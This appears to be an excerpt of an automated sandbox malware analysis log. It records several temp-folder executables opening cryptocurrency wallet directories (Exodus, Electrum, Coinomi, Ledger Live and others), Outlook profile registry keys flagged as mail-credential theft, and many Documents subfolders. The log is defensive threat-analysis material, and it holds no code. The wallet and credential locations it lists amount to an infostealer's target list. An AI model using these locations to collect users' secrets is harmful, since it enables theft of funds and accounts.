                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
